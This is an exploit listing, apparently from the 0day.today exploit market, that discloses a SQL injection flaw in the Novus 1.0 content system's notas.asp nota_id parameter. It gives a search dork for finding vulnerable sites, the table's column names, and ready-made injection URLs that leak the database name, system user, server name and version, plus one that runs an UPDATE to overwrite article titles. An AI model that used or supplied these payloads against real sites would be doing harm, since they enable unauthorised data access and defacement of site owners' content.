[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Novus 1.0 (notas.asp nota_id) Remote SQL Injection Vulnerability

Author
ka0x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2171
Category
web applications
Date add
25-09-2007
Platform
unsorted
================================================================
Novus 1.0 (notas.asp nota_id) Remote SQL Injection Vulnerability
================================================================



Novus - Sistema de administracion y contenido.
bug: Sql Inyection.
official site: http://novus.com.mx
d0rk: "Powered by Novus"
free: no
system: asp

bug found by ka0x
D.O.M TEAM
we: ka0x, an0de, xarnuz, s0cratex
ka0x01[at]gmail.com

tables:

1- a_nota.nota_id
2- a_nota.fe_publicacion
3- a_nota.seccion_id
4- a_nota.sub_sec_id
5- a_nota.estatus_id
6- a_nota.fe_alta
7- a_nota.usuario_id
8- a_nota.ultima_hora
9- a_nota.tema_id
10- a_nota.autor
11- a_nota.autor_id
12- a_nota.titulo
13- a_nota.resumen
14- a_nota.texto
15- a_nota.temporal

informacion server:

http://[novus]/notas.asp?nota_id=1+and+1=convert(int,db_name())
http://[novus]/notas.asp?nota_id=1+and+1=convert(int,system_user)
http://[novus]/notas.asp?nota_id=1+and+1=convert(int,@@servername)--
http://[novus]/notas.asp?nota_id=1+and+1=convert(int,@@version)--

update table tutulo:

http://[novus]/notas.asp?nota_id=0update+a_nota+set+titulo+=+'Novus Bug Sql Inyection'--

#from spain
-- 
// ka0x



#  0day.today [2024-12-24]  #